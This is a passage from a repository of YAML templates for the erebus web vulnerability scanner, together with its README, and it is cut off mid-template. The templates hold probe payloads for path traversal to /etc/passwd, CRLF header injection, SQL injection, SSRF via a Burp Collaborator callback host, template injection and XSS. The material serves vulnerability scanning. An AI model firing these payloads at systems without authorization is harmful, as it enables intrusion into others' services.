16 | Discussion • 17 | Community • 18 | Notes • 19 | Join Discord 20 |
21 | 22 | 23 | ---- 24 | 25 | Templates are the core of [erebus scanner](https://github.com/ethicalhackingplayground/erebus) which power the actual scanning engine. This repository stores and houses various templates for the scanner provided by our team as well as contributed by the community. We hope that you also contribute by sending templates via **pull requests** or [Github issue](https://github.com/ethicalhackingplayground/erebus-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Berebus-template%5D+) and grow the list. 26 | 27 | 28 | 💬 Discussion 29 | ----- 30 | 31 | Have questions / doubts / ideas to discuss? feel free to open a discussion using [Github discussions](https://github.com/ethicalhackingplayground/erebus-templates/discussions) board. 32 | 33 | 👨💻 Community 34 | ----- 35 | 36 | You are welcomed to join our [Discord Community](https://discord.gg/xmUAY5JG). You can also follow me on [Twitter](https://twitter.com/z0idsec) 37 | 38 | 💡 Notes 39 | ----- 40 | - Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/) to validate the syntax of templates before sending pull requests. 41 | 42 | 43 | Thanks again for your contribution and keeping the community vibrant. :heart: 44 | -------------------------------------------------------------------------------- /aem.yaml: -------------------------------------------------------------------------------- 1 | template: 2 | name: aem-traversal 3 | severity: medium 4 | author: "zoidsec" 5 | description: AEM CRX Path Traversal 6 | 7 | request: 8 | payloads: 9 | - '/content/..;/crx/packmgr/index.jsp' 10 | 11 | paths: true 12 | response: 13 | statusCode: 200 14 | patterns: 15 | - 'CRX Package Manager' 16 | -------------------------------------------------------------------------------- /crlf.yaml: -------------------------------------------------------------------------------- 1 | template: 2 | name: crlf-discovery 3 | severity: info 4 | author: zoidsec 5 | description: CRLF Discovery 6 | 7 | request: 8 | payloads: 9 | - "%0D%0ASet-Cookie:mycookie=myvalue" 10 | 11 | paths: false 12 | response: 13 | statusCode: 200 14 | header: 15 | - "Set-Cookie:mycookie=myvalue" 16 | exclude: 17 | - "%0D%0A" -------------------------------------------------------------------------------- /mysql-sqli.yaml: -------------------------------------------------------------------------------- 1 | template: 2 | name: mysql-sqli 3 | severity: high 4 | author: zoidsec 5 | description: Error Based SQL Injection Discovery 6 | 7 | request: 8 | payloads: 9 | - "'" 10 | paths: false 11 | response: 12 | statusCode: 500 13 | patterns: 14 | - "You have an error in your SQL syntax;" -------------------------------------------------------------------------------- /path-traversal.yaml: -------------------------------------------------------------------------------- 1 | template: 2 | name: path-traversal 3 | severity: high 4 | author: zoidsec 5 | description: Path Traversal etc/passwd Disclosure 6 | 7 | request: 8 | payloads: 9 | - "../../../../../../etc/passwd" 10 | - "../../../../../../etc/passwd%00" 11 | - "%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" 12 | - "%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd" 13 | 14 | paths: false 15 | response: 16 | statusCode: 200 17 | patterns: 18 | - "root:x:0:0:root" -------------------------------------------------------------------------------- /ssrf.yaml: -------------------------------------------------------------------------------- 1 | template: 2 | name: param-ssrf 3 | severity: info 4 | author: zoidsec 5 | description: Server-Side Request Forgery Parameter Based 6 | 7 | request: 8 | payloads: 9 | - http://zsvsszmbku3xldyywzg1jc0nkeq6ev.burpcollaborator.net 10 | 11 | paths: false 12 | response: 13 | statusCode: 200 14 | patterns: 15 | - lszm4qbbva85dqtcuv393czjkgz 16 | 17 | -------------------------------------------------------------------------------- /ssti.yaml: -------------------------------------------------------------------------------- 1 | template: 2 | name: ssti-discovery 3 | severity: high 4 | author: zoidsec 5 | description: Server Side Template Injection Discovery 6 | 7 | request: 8 | payloads: 9 | - "{{7*7}}foobar" 10 | 11 | paths: false 12 | response: 13 | statusCode: 200 14 | patterns: 15 | - "49foobar" 16 | -------------------------------------------------------------------------------- /xss-path.yaml: -------------------------------------------------------------------------------- 1 | template: 2 | name: xss-path 3 | severity: medium 4 | author: zoidsec 5 | description: Cross-Site-Scripting Path Based 6 | 7 | request: 8 | payloads: 9 | - '">' 10 | 11 | paths: true 12 | exclude: 13 | - .png 14 | - .svg 15 | - .tiff 16 | - .woff 17 | - .woff2 18 | - .js 19 | - .jpg 20 | - .gif 21 | - .css 22 | response: 23 | statusCode: 200 24 | patterns: 25 | - '">' 26 | -------------------------------------------------------------------------------- /xss-reflected.yaml: -------------------------------------------------------------------------------- 1 | template: 2 | name: xss-reflected 3 | severity: medium 4 | author: zoidsec 5 | description: Reflected Cross-Site-Scripting 6 | 7 | request: 8 | payloads: 9 | - '